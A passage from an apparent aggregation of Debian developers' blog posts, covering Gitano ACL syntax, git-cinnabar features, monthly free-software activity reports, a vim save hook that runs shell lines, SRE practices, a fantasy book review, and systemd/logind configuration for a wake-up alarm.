Jerry Pournelle Prince of Mercenaries (sff)
Jerry Pournelle West of Honor (sff)
Jerry Pournelle (ed.) Codominium: Revolt on War World (sff anthology)
Jerry Pournelle & S.M. Stirling Go Tell the Spartans (sff)
J.D. Salinger The Catcher in the Rye (mainstream)
Jessica Amanda Salmonson The Swordswoman (sff)
Stanley Schmidt Aliens and Alien Societies (nonfiction)
Cecilia Tan (ed.) Sextopia (sff anthology)
Lavie Tidhar Central Station (sff)
Catherynne Valente Chicks Dig Gaming (nonfiction)
J.E. Zimmerman Dictionary of Classical Mythology (nonfiction)

This is an interesting tour of a lot of stuff I read as a teenager (Asimov, Niven, Clancy, and Pournelle, mostly in combination with Niven but sometimes his solo work). I suspect I will no longer consider many of these books to be very good, and some of them will probably go back into used bookstores after I've re-read them for memory's sake, or when I run low on space again. But all those mass market SF novels were a big part of my teenage years, and a few (like Mote In God's Eye) I definitely want to read again. Also included is a random collection of stuff my parents picked up over the years. I don't know what to expect from a lot of it, which makes it fun to anticipate. Fall vacation is coming up, and with it a large amount of uninterrupted reading time.

8 July 2017

Daniel Silverstone: Gitano - Approaching Release - Access Control Changes

As mentioned previously I am working toward getting Gitano into Stretch. A colleague and friend of mine (Richard Maw) did a large pile of work on Lace to support what we are calling sub-defines. These let us simplify Gitano's ACL files, particularly for individual projects. In this posting, I'd like to cover what has changed with the access control support in Gitano, so if you've never used it then some of this may make little sense. Later on, I'll be looking at some better user documentation in conjunction with another friend of mine (Lars Wirzenius) who has promised to help produce a basic administration manual before Stretch is totally frozen.

Sub-defines

With a more modern lace (version 1.3 or later) there is a mechanism we are calling 'sub-defines'. Previously if you wanted to write a ruleset which said something like "Allow Steve to read my repository" you needed:
define is_steve user exact steve
allow "Steve can read my repo" is_steve op_read
And, as you'd expect, if you also wanted to grant read access to Jeff then you'd need yet another set of defines:
define is_jeff user exact jeff
define is_steve user exact steve
define readers anyof is_jeff is_steve
allow "Steve and Jeff can read my repo" readers op_read
This, while flexible (and still entirely acceptable), is wordy for small rulesets and so we added sub-defines to create this syntax:
allow "Steve and Jeff can read my repo" op_read [anyof [user exact jeff] [user exact steve]]
Of course, this is generally neater for simpler rules, if you wanted to add another user then it might make sense to go for:
define readers anyof [user exact jeff] [user exact steve] [user exact susan]
allow "My friends can read my repo" op_read readers
The nice thing about this sub-define syntax is that it's basically usable anywhere you'd use the name of a previously defined thing, they're compiled in much the same way, and Richard worked hard to get good error messages out from them just in case.

No more auto_user_XXX and auto_group_YYY

As a result of the above being implemented, the support Gitano previously grew for automatically defining users and groups has been removed. The approach we took was pretty inflexible and risked compilation errors if a user was deleted or renamed, and so the sub-define approach is much much better. If you currently use auto_user_XXX or auto_group_YYY in your rulesets then your upgrade path isn't bumpless but it should be fairly simple:
  1. Upgrade your version of lace to 1.3
  2. Replace any auto_user_FOO with [user exact FOO] and, similarly, any auto_group_BAR with [group exact BAR].
  3. You can now upgrade Gitano safely.

No more 'basic' matches

Since Gitano first gained support for ACLs using Lace, we had a mechanism called 'simple match' for basic inputs such as groups, usernames, repo names, ref names, etc. Simple matches looked like user FOO or group !BAR. The match syntax grew more and more arcane as we added Lua pattern support (refs ~^refs/heads/$ user /.). When we wanted to add proper PCRE regex support we added a syntax of the form user pcre ^/.+?..., where pcre could be any of: exact, prefix, suffix, pattern, or pcre. We had a complex set of rules for exactly what the sigils at the start of the match string might mean in what order, and it was getting unwieldy. To simplify matters, none of the "backward compatibility" remains in Gitano. You instead MUST use the 'what how with' match form. To make this slightly more natural to use, we have added a bunch of aliases: is for exact, starts and startswith for prefix, and ends and endswith for suffix. In addition, the kind of match can be prefixed with a ! to invert it, and for natural-looking rules, not is an alias for !is. This means that your rulesets MUST be updated to support the more explicit syntax before you update Gitano, or else nothing will compile. Fortunately this form has been supported for a long time, so you can do this in three steps.
  1. Update your gitano-admin.git global ruleset. For example, the old form of the defines used to contain define is_gitano_ref ref ~^refs/gitano/ which can trivially be replaced with: define is_gitano_ref ref prefix refs/gitano/
  2. Update any non-zero rulesets your projects might have.
  3. You can now safely update Gitano
If you want a reference for making those changes, you can look at the Gitano skeleton ruleset which can be found at https://git.gitano.org.uk/gitano.git/tree/skel/gitano-admin/rules/ or in /usr/share/gitano if Gitano is installed on your local system. Next time, I'll likely talk about the deprecated commands which are no longer in Gitano, and how you'll need to adjust your automation to use the new commands.

1 April 2017

Mike Hommey: git-cinnabar experimental features

Since version 0.4.0, git-cinnabar has a few hidden experimental features. Two of them are available in 0.4.0, and a third was recently added on the master branch. The basic mechanism to enable experimental features is to set a preference in the git configuration with a comma-separated list of features to enable, or all, for all of them. That preference is cinnabar.experiments, and any means to set a git configuration can be used (for example, git config cinnabar.experiments wire,merge). But what features are there?

wire

In order to talk to Mercurial repositories, git-cinnabar normally uses the mercurial python modules. This experimental feature allows accessing Mercurial repositories without using the mercurial python modules. It then relies on git-cinnabar-helper to connect to the repository through the mercurial wire protocol. As of version 0.4.0, the feature is automatically enabled when Mercurial is not installed.

merge

Git-cinnabar currently doesn't allow pushing merge commits. The main reason for this is that generating the correct mercurial data for those merges is tricky, and needs to be gotten right. In version 0.4.0, enabling this feature allows pushing merge commits as long as the parent commits are available on the mercurial repository. If they aren't, you need to first push them independently, and then push the merge. On current master, that limitation doesn't exist anymore; you can just push everything in one go. The main caveat with this experimental support for pushing merges is that it currently doesn't handle the case where a file was moved on one of the branches the same way mercurial would (i.e. the information would be lost to mercurial users).

clonebundles

As of mercurial 3.6, Mercurial servers can opt in to providing pre-generated bundles, which, when clients support it, takes CPU load off the server when a clone is performed. Good for servers, and usually good for clients too when they have a fast network connection, because downloading a pre-generated bundle is usually faster than waiting for the server to generate one. As of a few days ago, the master branch of git-cinnabar supports cloning using those pre-generated bundles, provided the server advertises them (mozilla-central does).

2 February 2017

Paul Wise: FLOSS Activities January 2017

Changes

Issues

Review

Administration
  • Debian: reboot 1 non-responsive VM, redirect 2 users to support channels, redirect 1 contributor to xkb upstream, redirect 1 potential contributor, redirect 1 bug reporter to mirror team, ping 7 folks about restarting processes with upgraded libs, manually restart the sectracker process due to upgraded libs, restart the package tracker process due to upgraded libs, investigate failures connecting to the XMPP service, investigate /dev/shm issue on abel.d.o, clean up after rename of the fedmsg group.
  • Debian mentors: lintian/security updates & reboot
  • Debian packages: deploy 2 contributions to the live server
  • Debian wiki: unblacklist 1 IP address, whitelist 10 email addresses, disable 18 accounts with bouncing email, update email for 2 accounts with bouncing email, reported 1 Debian member as MIA, redirect 1 user to support channels, add 4 domains to the whitelist.
  • Reproducible builds: rescheduled Debian pyxplot:amd64/unstable for themill.
  • Openmoko: security updates & reboots.

Debian derivatives
  • Send the annual activity ping mail.
  • Happy new year messages on IRC, forward to the list.
  • Note that SerbianLinux does not provide source packages.
  • Expand URL shortener on SerbianLinux page.
  • Invite PelicanHPC, Netrunner, DietPi, Hamara Linux (on IRC), BitKey to the census.
  • Add research publications link to the census template
  • Fix Symbiosis sources.list
  • Enquired about SalentOS downtime
  • Fixed and removed some 404 BlankOn links (blog, English homepage)
  • Fixed changes to AstraLinux sources.list
  • Welcome Netrunner to the census

Sponsors

I renewed my support of Software Freedom Conservancy. The openchange 1:2.2-6+deb8u1 upload was sponsored by my employer. All other work was done on a volunteer basis.

1 February 2017

Antoine Beaupré: My free software activities, January 2017

manpages.debian.org launched

The debmans package I had so lovingly worked on last month is now officially abandoned. It turns out that another developer, Michael Stapelberg, wrote his own implementation from scratch, called debiman. Both pieces of software share a similar design: they are both static site generators that parse an existing archive and call another tool to convert manpages into HTML. We even both settled on the same converter (mdoc). But while I wrote debmans in Python, debiman is written in Go. debiman also seems much faster, being written with concurrency in mind from the start. Finally, debiman is more feature complete: it properly deals with conflicting packages, localization and all sorts of redirections. Heck, it even has a pretty logo, how can I compete? While debmans was written first and was in the process of being deployed, I had to give it up. It was a frustrating experience because I felt I wasted a lot of time working on software that ended up being discarded, especially because I put so much work into it, creating extensive documentation, an almost complete test suite and even filing a detailed core infrastructure best practices report. In the end, I think that was the right choice: debiman seemed clearly superior and the best tool should win. Plus, it meant less work for me: Michael and Javier (the previous manpages.debian.org maintainer) did all the work of putting the site online. I also learned a lot about the CII best practices program, flask, click and, ultimately, the Go programming language itself, which I'll refer to as Golang for brevity. debiman definitely brought Golang into the spotlight for me. I had looked at Go before, but it seemed to be yet another language. But seeing Michael beat me to rebuilding the service really made me look at it again more seriously. I really appreciate Python and will probably still use it as my language of choice for GUI work and smaller scripts, but for daemons, network programs and servers, I will seriously consider Golang in the future. The site is now online at https://manpages.debian.org/. I even got credited in the about page, which makes up for the disappointment.

Wallabako downloads Wallabag articles on my Kobo e-reader

This obviously brings me to the latest project I worked on, Wallabako, my first Golang program ever. Wallabako is basically a client for the Wallabag application, which is a free software "read it later" service, an alternative to the likes of Pocket, Pinboard or Evernote. Back in April, I had looked at downloading my "unread articles" into my new ebook reader, going through convoluted ways like implementing OPDS support into Wallabag, which turned out to be too difficult. Instead, I used this as an opportunity to learn Golang. After reading the quite readable golang specification over the weekend, I found the language to be quite elegant and simple, yet very powerful. Golang feels like C, but built with concurrency and memory (and to a certain extent, type) safety in mind, along with a novel approach to OO programming. The fact that everything can be compiled into one neat little static binary was also a key feature in selecting golang for this project, as I do not have much control over the platform my E-Reader is running: it is a Linux machine running under the ARM architecture, but beyond that, there isn't much available. I couldn't afford to ship a Python interpreter in there and while there are solutions like pyinstaller, I felt that it may not be so easy to deploy on ARM. The borg team had trouble building an ARM binary, resorting to tricks like building on a Raspberry Pi or inside an emulator. In comparison, the native go compiler supports cross-compilation out of the box through a simple environment variable. So far Wallabako works amazingly well: when I "bag" a new article in Wallabag, either from my phone or my web browser, it will show up on my ebook reader the next time I open the wifi. I still need to "tap" the screen to fake the insertion of the USB cable, but we're working on automating that. I also need to make the installation of the software much easier and improve the documentation, because so far it's unlikely that someone unfamiliar with Kobo hardware hacking will be able to install it.

Other work

According to Github, I filed a bunch of bugs all over the place (25 issues in 16 repositories), sent patches everywhere (13 pull requests in 6 repositories), and tried to fix everything (created 38 commits in 7 repositories). Note that this excludes most of my work, which happens on Gitlab. January was still a very busy month, especially considering I had an accident which kept me mostly offline for about a week. Here are some details on specific projects.

Stressant and a new computer

I revived the stressant project and got a new computer. This will be covered in a separate article.

Linkchecker forked

After much discussion, it was decided to fork the linkchecker project, which now lives in its own organization. I still have to write community guidelines and figure out the best way to maintain a stable branch, but I am hopeful that the community will pick up the project, as multiple people have volunteered to co-maintain it. There have already been pull requests and issues reported, so that's a good sign.

Feed2tweet refresh

I re-rolled my pull requests to the feed2tweet project: last time they were closed before I had time to rebase them. The author was okay with me re-submitting them, but he hasn't commented, reviewed or merged the patches yet, so I am worried they will be dropped again. At that point, I would more likely rewrite this from scratch than try to collaborate with someone that is clearly not interested in doing so...

Debian uploads

Debian Long Term Support (LTS)

This is my 10th month working on Debian LTS, started by Raphael Hertzog at Freexian. I took two months off last summer, which means it's actually been a year of work on the LTS project. This month I worked on a few issues, but they were big issues, so they took a lot of time. I have done a lot of work trying to backport the heading sanitization patches for CVE-2016-8743. The full report explains all the gritty details, but I ran out of time and couldn't upload the final version either. The issue mostly affects Apache servers in proxy configurations so it's not so severe as to warrant an immediate upload anyways. A lot of my time was spent battling the tiff package. The report mentions fixes for 15 CVEs and I uploaded the result in the DLA-795-1 advisory. I also worked on a small update to graphicsmagick for CVE-2016-9830 that is still pending because the issue is minor and we're waiting for more to pile up. See the full report for details. Finally, there was a small discussion surrounding tools to use when building and testing updates to LTS packages. The resulting conversation was interesting, but it showed that we have a big documentation problem in the Debian project. There are a lot of tools, and the documentation is old and distributed everywhere. Every time I want to contribute something to the documentation, I never know where to start or where to go. This is why I wrote a separate debian development guide instead of contributing to existing documentation...

16 March 2016

Enrico Zini: Postprocessing files saved by vim

Processing vim buffers through an external program on save is a technique that is probably in use, but that I have not found documented anywhere, so here we go. Skip to the details for the entertaining example. I wanted to integrate egt with TaskWarrior so that every time I am editing an egt project file in vim, if I write a line in a certain way then a new taskwarrior task is created. Also, I have never written a vim plugin, and I don't want to dive into another rabbit hole just yet. Lynoure brought to my attention that taskwiki processes things when the file is saved, so I thought that I could probably get a long way by piping the file from vim into egt and reading it back before saving. I created a new egt annotate command that reads a project file, tweaks it, and then prints it out; I opened a project file in vim; I typed :%!egt annotate %:p --stdin and saw that it could be done. I find the result quite fun: I type 15 March: 18:00-21:00 in a log in egt, save the file, and it becomes 15 March: 18:00-21:00 3h. I do something in TaskWarrior, save the file in egt, and the lines that are TaskWarrior tasks update with the new task states.

Details

Here's a step by step example of how to hook into vim in this way. First thing, create a filter script that processes text files in some way. Let's call this /usr/local/bin/pyvimshell:
#!/usr/bin/python3
import sys
import subprocess
for line in sys.stdin:
    print(line.rstrip(), file=sys.stdout)
    line = line.strip()
    if line == "$":
        pass
    elif line.startswith("$"):
        out = subprocess.check_output(["sh", "-c", line[1:].strip()], universal_newlines=True)
        sys.stdout.write(out)
        if not out.endswith("\n"):
            sys.stdout.write("\n")
        print("$ ", file=sys.stdout)
Then let's create a new filetype in ~/.vim/filetype.vim for our special magic text files:
if exists("did_load_filetypes")
  finish
endif
augroup filetypedetect
  au! BufNewFile,BufRead *.term setf SillyShell
augroup END
If you create a file example.term, open it in vim, and type :set ft, it should say SillyShell. Finally, the hook goes in ~/.vim/after/ftplugin/SillyShell.vim:
function! SillyShellRun()
    " filter the whole buffer through the filter script created above
    :%!/usr/local/bin/pyvimshell
    " jump to the end of the buffer
    :$
endfunction
autocmd BufWritePre,FileWritePre <buffer> :silent call SillyShellRun()
Now you can create a file example.term, open it in vim, type $ ls, save it, and suddenly you have a terminal with infinite scrollback. For egt, I actually want to preserve my cursor position across saves, and egt also needs to know the path to the project file, so here is the egt version of the hook:
function! EgtAnnotate()
    let l:cur_pos = getpos(".")
    :%!egt annotate --stdin %:p
    call setpos(".", l:cur_pos)
endfunction
autocmd BufWritePre,FileWritePre <buffer> :silent call EgtAnnotate()
I find this adorably dangerous. Have fun.

29 October 2015

Martín Ferrari: Tales from the SRE trenches: SREs are not firefighters

This is the third part in a series of articles about SRE, based on the talk I gave at the Romanian Association for Better Software. If you haven't already, you might want to read part 1 and part 2 first. In this post, I talk about some strategies to avoid drowning SRE people in operational work.

SREs are not firefighters As I said before, it is very important that there is trust and respect between Dev and Ops. If Ops is seen as just an army of firefighters who will gladly put out fires at any time of the night, there is less incentive to make good software. Conversely, if Dev is shielded from the realities of the production environment, Ops will tend to think of them as delusional and untrustworthy.

Common staffing pool for SRE and SWE The first tool to combat this at Google (and possibly a difficult one to implement in small organisations) is to have a single headcount budget for Dev and Ops. That means that the more SREs you need to support your service, the fewer developers you have to write it. Combined with this, Google offers SREs the possibility to move freely between teams, or even to transfer out to SWE. Because of this, a service that is painful to support will see its most senior SREs leaving and will only be able to afford less experienced hires. All this is a strong incentive to write good-quality software, to work closely with the Ops people, and to listen to them.

Share 5% of operational work with the SWE team On the other hand, it is necessary that developers see first-hand how the service works in production, understand the problems, and share the pain of things failing. To this end, SWEs are expected to take on a small fraction of the operational work from SRE: handling tickets, being on-call, performing deployments, or managing capacity. This results in better communication among the teams and a common understanding of priorities.

Cap operational load at 50% One very uncommon rule from SRE at Google is that SREs are not supposed to spend more than half of their time on "operational work". SREs are supposed to spend their time on automation, monitoring, forecasting growth... not on repeatedly fixing, by hand, issues that stem from bad systems.

Excess operational work overflows to SWE If an SRE team is found to be spending too much time on operational work, that extra load is automatically reassigned to the development team, so SRE can keep doing their non-operational duties. In extreme cases, a service might be deemed too unstable to maintain, and SRE support is completely removed: it means the development team now has to carry pagers and do all the operational work themselves. It is a nuclear option, but the threat of it happening is a strong incentive to keep things sane.
The next post will be less about how to avoid unwanted work and more about the things that SREs actually do, and how these make things better.

20 October 2015

Russ Allbery: Review: The Oathbound

Review: The Oathbound, by Mercedes Lackey
Series: Vows and Honor #1
Publisher: DAW
Copyright: July 1988
ISBN: 0-88677-414-4
Format: Mass market
Pages: 302
This book warrants a bit of explanation. Before Arrows of the Queen, before Valdemar (at least in terms of publication dates), came Tarma and Kethry short stories. I don't know if they were always intended to be set in the same world as Valdemar; if not, they were quickly included. But they came from another part of the world and a slightly different sub-genre. While the first two Valdemar trilogies were largely coming-of-age fantasy, Tarma and Kethry are itinerant sword-and-sorcery adventures featuring two women with a soul bond: the conventionally attractive, aristocratic mage Kethry, and the celibate, goddess-sworn swordswoman Tarma. Their first story was published, appropriately, in Marion Zimmer Bradley's Swords and Sorceress III. This is the first book about Tarma and Kethry. It's a fix-up novel: shorter stories, bridged and re-edited, and glued together with some additional material. And it does not contain the first Tarma and Kethry story. As mentioned in my earlier Valdemar reviews, this is a re-read, but it's been something like twenty years since I previously read the whole Valdemar corpus (as it was at the time; I'll probably re-read everything I have on hand, but it's grown considerably, and I may not chase down the rest of it). One of the things I'd forgotten is how oddly, from a novel reader's perspective, the Tarma and Kethry stories were collected. Knowing what I know now about publishing, I assume Swords and Sorceress III was still in print at the time The Oathbound was published, or the rights weren't available for some other reason, so their first story had to be omitted. Whatever the reason, The Oathbound starts with a jarring gap that's no less irritating in this re-read than it was originally. Also as is becoming typical for this series, I remembered a lot more world-building and character development than is actually present in at least this first book. In this case, I strongly suspect most of that characterization is in Oathbreakers, which I remember as being more of a coherent single story and less of a fix-up of puzzle and adventure stories with scant time for character growth. I'll be able to test my memory shortly. What we do get is Kethry's reconciliation of her past, a brief look at the Shin'a'in and the depth of Tarma and Kethry's mutual oath (unfortunately told more than shown), the introduction of Warrl (again, a relationship that will grow a great deal more depth later), and then some typical sword and sorcery episodes: a locked room mystery, a caravan guard adventure about which I'll have more to say later, and two rather unpleasant encounters with a demon. The material is bridged enough that it has a vague novel-like shape, but the bones of the underlying short stories are pretty obvious. One can tell this isn't really a novel even without the tell of a narrative recap in later chapters of events that you'd just read earlier in the same book. What we also get is rather a lot of rape, and one episode of seriously unpleasant "justice." A drawback of early Lackey is that her villains are pure evil. My not entirely trustworthy memory tells me that this moderates over time, but early stories tend to feature villains completely devoid of redeeming qualities. In this book alone one gets to choose between the rapist pedophile, the rapist lord, the rapist bandit, and the rapist demon who had been doing extensive research in Jack Chalker novels. You'll notice a theme. 
Most of the rape happens off camera, but I was still thoroughly sick of it by the end of the book. This was already a clichéd motivation tactic when these stories were written. Worse, as with the end of Arrow's Flight, the protagonists don't seem to be above a bit of "turnabout is fair play." When you're dealing with rape as a primary plot motivation, that goes about as badly as you might expect. The final episode here involves a confrontation that Tarma and Kethry brought entirely on themselves through some rather despicable actions, and from which they should have taken a lesson about why civilized societies have criminal justice systems. Unfortunately, despite an ethical priest who is mostly played for mild amusement, no one in the book seems to have drawn that rather obvious conclusion. This, too, I recall as getting better as the series goes along and Lackey matures as a writer, but that only helps marginally with the early books. Some time after the publication of The Oathbound and Oathbreakers, something (presumably the rights situation) changed. Oathblood was published in 1998 and includes not only the first Tarma and Kethry story but also several of the short stories that make up this book, in (I assume) something closer to their original form. That makes The Oathbound somewhat pointless and entirely skippable. I re-read it first because that's how I first approached the series many years ago, and (to be honest) because I'd forgotten how much was reprinted in Oathblood. I'd advise a new reader to skip it entirely, start with the short stories in Oathblood, and then read Oathbreakers before reading the final novella. You'd miss the demon stories, but that's probably for the best. I'm complaining a lot about this book, but that's partly from familiarity. If you can stomach the rape and one stunningly unethical protagonist decision, the stories that make it up are solid and enjoyable, and the dynamic between Tarma and Kethry is always a lot of fun (and gets even better when Warrl is added to the mix). I think my favorite was the locked room mystery. It's significantly spoiled by knowing the ending, and it has little deeper significance, but it's the classic sort of unembellished, unapologetic sword-and-sorcery tale that's hard to come by in books. But since it too is reprinted (in a better form) in Oathblood, there's no point in reading it here. Followed by Oathbreakers. Rating: 6 out of 10

16 April 2015

Andrew Shadura: Power button and logind

If you have configured your laptop's power button to act as a sleep button using acpid, then installed systemd or systemd-shim and pressed the button, only to find your laptop shutting down after it wakes up from sleep, set these options in /etc/systemd/logind.conf:
[Login]
HandlePowerKey=ignore
HandleSuspendKey=ignore
HandleHibernateKey=ignore
HandleLidSwitch=ignore
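Note that logind only reads this file at startup, so the new settings won't apply until the service is restarted; restarting it as root (my addition, a step the original post doesn't spell out) should do it:
# logind re-reads logind.conf when it starts
systemctl restart systemd-logind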

1 April 2015

Benjamin Mako Hill: More Community Data Science Workshops

Pictures from the CDSW sessions in Spring 2014
After two successful rounds in 2014, I'm helping put on another round of the Community Data Science Workshops. Last year, our 40+ volunteer mentors taught more than 150 absolute beginners the basics of programming in Python, data collection from web APIs, and tools for data analysis and visualization, and we're still in the process of improving our curriculum and scaling up. Once again, the workshops will be totally free of charge and open to anybody. Once again, they will be made possible through the generous participation of a small army of volunteer mentors. We'll be meeting for four sessions over three weekends. If you're interested in attending, or in volunteering as a mentor, you can go to the information and registration page for the current round of workshops and sign up before April 3rd.

9 December 2014

Joey Hess: podcasts that don't suck, 2014 edition

Also, out of the podcasts I listed previously, I still listen to and enjoy Free As In Freedom, Off the Hook, and the Long Now Seminars. PS: A nice podcatcher for the technically inclined is git-annex importfeed. Featuring a list of feeds in a text file, and distributed podcatching!
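In practice (a sketch of my own, not from Joey's post), the feeds-in-a-text-file workflow could look like this inside an existing git-annex repository:
# feeds.txt contains one podcast feed URL per line;
# importfeed downloads new enclosures from each feed into the annex
xargs git annex importfeed < feeds.txt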

26 October 2014

Joey Hess: a programmable alarm clock using systemd

I've taught my laptop to wake up at 7:30 in the morning. When it does, it will run whatever's in my ~/bin/goodmorning script. Then, if the lid is still closed, it will go back to sleep again. So, it's a programmable alarm clock that doesn't need the laptop to be left turned on to work. But it doesn't have to make noise and wake me up (I rarely want to be woken up by an alarm; the sun coming in the window is a much nicer method). It can handle other tasks like downloading my email, before I wake up. When I'm at home and on dialup, this tends to take an hour in the morning, so it's nice to let it happen before I get up. This took some time to figure out, but it's surprisingly simple. Besides ~/bin/goodmorning, which can be any program/script, I needed just two files to configure systemd to do this. /etc/systemd/system/goodmorning.timer
[Unit]
Description=good morning
[Timer]
Unit=goodmorning.service
OnCalendar=*-*-* 7:30
WakeSystem=true
Persistent=false
[Install]
WantedBy=multi-user.target
/etc/systemd/system/goodmorning.service
[Unit]
Description=good morning
RefuseManualStart=true
RefuseManualStop=true
ConditionACPower=true
[Service]
Type=oneshot
ExecStart=/bin/systemd-inhibit --what=handle-lid-switch --why=goodmorning /bin/su joey -c "/usr/bin/timeout 45m /home/joey/bin/goodmorning"
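For completeness, here is a minimal sketch of what ~/bin/goodmorning might contain (my own illustration; the post leaves the script's contents entirely up to you):
#!/bin/sh
# hypothetical goodmorning script: download mail before wake-up time
# (replace with whatever you want done while you sleep)
offlineimap -o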
installation
After installing those files, run (as root): systemctl enable goodmorning.timer; systemctl start goodmorning.timer
Then, you'll also need to edit /etc/systemd/logind.conf, and set LidSwitchIgnoreInhibited=no -- this overrides the default, which is not to let systemd-inhibit block sleep on lid close.

almost too easy
I don't think this would be anywhere near as easy to do without systemd, logind, etc. Especially the handling of waking the system at the right time, and the behavior around lid-sleep inhibiting. The WakeSystem=true relies on some hardware support for waking from sleep; my laptop supported it with no trouble, but I don't know how broadly available that is. Also, notice the ConditionACPower=true, which I added once I realized I don't want the job to run if I forgot to leave the laptop plugged in overnight. Technically, it will still wake up when on battery power, but then it should go right back to sleep. Quite a lot of nice pieces of systemd all working together here!

xfce workaround
If using xfce, xfce4-power-manager takes over handling of lid close from systemd, and currently prevents the system from going back to sleep if the lid is still closed when goodmorning finishes. Happily, there is an easy workaround; this configures xfce to not override the lid switch behavior: xfconf-query -c xfce4-power-manager -n -p /xfce4-power-manager/logind-handle-lid-switch -t bool -s true
Other desktop environments may have similar issues.

why not a per-user unit?
It would perhaps be better to use the per-user systemd, not the system-wide one. Then I could change the time the alarm runs without using root. What's prevented me from doing this is that systemd-inhibit uses policykit, and policykit prevents it from being used in this situation. It's a lot easier to run it as root and use su than it is to reconfigure policykit.
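To confirm that everything is wired up (my addition, not from the original post), you can ask systemd when the timer will next fire:
# shows load state, last trigger, and the next scheduled activation
systemctl list-timers goodmorning.timer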

19 October 2014

Benjamin Mako Hill: Another Round of Community Data Science Workshops in Seattle

Pictures from the CDSW sessions in Spring 2014
I am helping coordinate three and a half day-long workshops in November for anyone interested in learning how to use programming and data science tools to ask and answer questions about online communities like Wikipedia, free and open source software, Twitter, civic media, etc. This will be a new and improved version of the workshops run successfully earlier this year. The workshops are for people with no previous programming experience and will be free of charge and open to anyone. Our goal is that, after the three workshops, participants will be able to use data to produce numbers, hypothesis tests, tables, and graphical visualizations that answer questions about those communities. If you are interested in participating, fill out our registration form here before October 30th. We were heavily oversubscribed last time, so registering may help. If you already know how to program in Python, it would be really awesome if you would volunteer as a mentor! Being a mentor will involve working with participants and talking them through the challenges they encounter in programming. No special preparation is required. If you're interested, send me an email.
